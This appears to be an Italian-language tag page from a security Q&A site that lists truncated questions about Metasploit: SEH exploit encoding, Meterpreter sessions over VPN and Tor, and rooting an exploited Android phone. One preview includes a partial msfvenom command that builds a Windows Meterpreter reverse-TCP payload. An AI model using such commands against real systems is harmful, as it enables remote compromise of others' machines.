Domande con tag 'metasploit'

domande con tag
2
risposte

Codifica di un indirizzo che contiene un byte nullo in un payload

Sto lavorando a un exploit SEH. il problema che sto affrontando qui è che tutti gli indirizzi POP / POP / RETN terminano con byte null, quindi tutto viene posizionato dopo che è stato danneggiato. È possibile utilizzare Metasploit Msfencode p...
posta 03.08.2013 - 16:56
1
risposta

Codifica un file eseguibile più volte usando il veleno MSF

Sto provando più codifiche sullo stesso file eseguibile, ma confuso con la sintassi. Il problema: Per codificare qualsiasi file eseguibile possiamo usare la sintassi: msfvenom -p windows/meterpreter/reverse_tcp LHOST=XXX.XXX.XX.X LPOR...
posta 18.03.2017 - 17:45
1
risposta

POC di un exploit Java usando JRE rimanenti

Riepilogo : vorrei mostrare una prova di concetto di un exploit Java utilizzando una vecchia JRE su un computer aggiornato per ridurre le discussioni brevi su "ma siamo rattoppati quindi perché rimuovere le versioni precedenti " soggetto....
posta 22.05.2013 - 11:10
1
risposta

Ottenere l'accesso root su un telefono Android sfruttato con MetaSploit

Ho utilizzato MetaSploit per un po '(3 anni) e ho appena iniziato a sfruttare Android . Il mio Android ha accesso root e SuperSu è configurato per "concedere" tutte le richieste SU . Ho installato payload s...
posta 02.07.2017 - 05:05
2
risposte

Meterpreter session over VPN

Ho la seguente situazione: Macchina attaccante collegata a un router con IP pubblico assegnato dall'ISP, inoltro abilitato. Macchina vittima connessa ad un altro router, (ovviamente) diverso IP assegnato da ISP diverso. Voglio stabilire...
posta 31.03.2016 - 15:48
0
risposte

Meterpreter (Metasploit) collegamento inverso anonimo su Tor2web

Il consenso generale sembra essere quello di impostare un listener su un server accessibile da un IP pubblico e un certo port forwarding. Per l'anonimato questo dovrebbe essere un server di riserva o una casella compromessa. Ho cercato di cre...
posta 19.03.2017 - 15:43
0
risposte

Metasploit DCERPC BindError

Sto cercando di ottenere l'accesso alla shell al mio router / gateway di casa, quindi ho deciso di utilizzare metasploit e nmap per scoprire se c'erano delle vulnerabilità che potevo usare: [marcel@GLaDOS ~]$ sudo nmap -sS -Pn -A 192.168.2.1...
posta 21.06.2017 - 20:55
1
risposta

Errore Esecuzione della shell dei comandi: TimeoutError Operation Time out

Sto testando un payload linux / x86 / meterpreter / reverse_tcp nella mia rete Test Linux per exploit, ho preso una sessione Meterpreter di Metasploit che lo usa, ho provato diversi comandi come getuid, cat e tutti quelli che funzionano bene, ma...
posta 26.05.2016 - 08:33
1
risposta

È possibile eseguire un comando sul computer locale in meterpreter?

Durante l'esecuzione del gestore meterpreter, è possibile eseguire un comando sul computer locale? Questo non è stato menzionato nell'output del comando help . Ho anche provato !ls e senza risultati. Allora è possibile?     
posta 11.08.2013 - 10:49
4
risposte

Come sfruttano exploit e payload?

Sapevo di Metasploit Framework da alcuni anni, ma non ci ho mai pensato. Ho una certa conoscenza quando si tratta di reti, ma io non sono un professionista. Ho provato alcune cose con Metasploit e sono stato curioso di una cosa.  (correggimi se...
posta 09.06.2014 - 16:19